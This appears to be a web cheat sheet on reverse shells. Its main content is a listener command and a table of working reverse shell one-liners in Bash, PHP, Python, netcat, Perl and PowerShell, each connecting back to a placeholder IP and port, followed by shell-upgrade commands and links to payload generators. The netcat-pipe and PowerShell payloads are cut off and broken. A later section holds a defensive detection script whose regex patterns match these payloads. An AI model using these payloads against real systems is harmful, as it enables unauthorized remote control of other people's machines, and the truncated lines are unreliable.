
A reverse shell is a shell session established on a connection that is initiated from a remote machine (victim). Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the victim machine and continue their attack. In other words, it is a technique used by attackers to gain access to a target machine by opening up a network connection between the attacker’s machine and the victim machine. Once the connection is established, the attacker can execute commands on the target machine as if they were sitting in front of it.

Create listener

Creation of listener with netcat:

$ nc -lvnp 4444
  • -l ⇒ Listen mode, to wait for a connection to connect to us.
  • -v ⇒ Verbose mode, so that we know when we receive a connection.
  • -n ⇒ Disable DNS resolution and only connect from/to IPs, to speed up the connection.
  • -p ⇒ Port number netcat is listening on, and the reverse connection should be sent to.

Reverse Shell Payloads

Note

The NC v2 type creates a named pipe in the /tmp directory. This file write may be detected by defensive products such as AV/EDR.

Type ⇒ Payload
  • Bash ⇒ bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
  • PHP ⇒ php -r '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
  • Python ⇒ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • NC v1 ⇒ nc -e /bin/sh <IP> <PORT>
  • NC v2 ⇒ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f
  • Perl ⇒ perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • PowerShell ⇒ powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("$ip",$port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535

Upgrading Shell

When you have a shell, always try to upgrade your reverse shell to get more commands and parameters at your disposal. Below is a list of possible reverse shell upgrades.

Type ⇒ Payload
  • Python 2 ⇒ python -c 'import pty; pty.spawn("/bin/bash")'
  • Python 3 ⇒ python3 -c 'import pty; pty.spawn("/bin/bash")'
  • Bash ⇒ echo os.system("/bin/bash")
  • Perl ⇒ perl -e 'exec "/bin/bash";'
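From the defender's side, the payloads and upgrade commands listed above share a few structural fingerprints (the /dev/tcp redirect, nc -e, mkfifo in /tmp, socket+dup2, pty.spawn) that can be matched in process command-line telemetry. The following is an added detection example, not code from the original page; the log lines are constructed, the field layout and the IP/port values are assumptions:

```python
import re

# Indicator patterns derived from the payload table on this page.
# Each regex matches the structural part of a payload rather than a
# specific IP or port, so renamed hosts or ports do not evade it.
INDICATORS = [
    ("bash /dev/tcp redirect", re.compile(r"/dev/tcp/\S+/\d+")),
    ("netcat -e shell", re.compile(r"\bnc(?:at)?\b.*\s-e\s+/bin/(?:ba)?sh")),
    ("mkfifo /tmp pipe shell", re.compile(r"mkfifo\s+/tmp/\S+")),
    ("python socket dup2 shell", re.compile(r"socket\.socket\(.*os\.dup2\(.*subprocess")),
    ("php fsockopen shell", re.compile(r"fsockopen\(.*exec\(")),
    ("perl Socket exec shell", re.compile(r"use Socket;.*exec\(")),
    ("powershell TCPClient", re.compile(r"Net\.Sockets\.TCPClient", re.IGNORECASE)),
    ("pty.spawn tty upgrade", re.compile(r"pty\.spawn\(")),
]


def find_reverse_shell_indicators(lines):
    """Return [(line_index, indicator_name), ...] for every line that matches an indicator."""
    hits = []
    for idx, line in enumerate(lines):
        for name, rx in INDICATORS:
            if rx.search(line):
                hits.append((idx, name))
    return hits


# Constructed sample log lines (not real telemetry): process command lines
# as an auditd/EDR feed might record them. IP and port values are made up.
SAMPLE_LOG = [
    "uid=33 comm=bash cmd=bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "uid=33 comm=nc cmd=nc -e /bin/sh 10.0.0.5 4444",
    "uid=33 comm=sh cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f",
    "uid=1000 comm=python3 cmd=python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "uid=1000 comm=ls cmd=ls -la /tmp",
    "uid=0 comm=cron cmd=/usr/sbin/cron -f",
]

if __name__ == "__main__":
    for idx, name in find_reverse_shell_indicators(SAMPLE_LOG):
        print(f"line {idx}: {name}: {SAMPLE_LOG[idx]}")
```

The pattern list is a starting point for a rule set; real command lines should be normalized (decoded base64, collapsed whitespace) before matching, and hits should be correlated with the outbound connection the process actually makes.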

Shell fixes

When your shell is broken, or it is not showing the right formatting on your screen, you can try to fix your shell with the commands below.

Type ⇒ Fix
  • Fix Output ⇒ stty raw -echo
  • Get Window Size ⇒ stty size
  • Fix Window Size ⇒ stty rows X cols Y

References

Reverse Shell Generator

With this tool various reverse shell payloads can be generated:

Online - Reverse Shell Generator

pentestmonkey

Another great source is a PHP reverse shell from Pentestmonkey, see link below.

pentestmonkey - Overview

Payload All The Things

Reverse Shell cheatsheet: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

Pentest.ws

An overview of several reverse shells: pentest.ws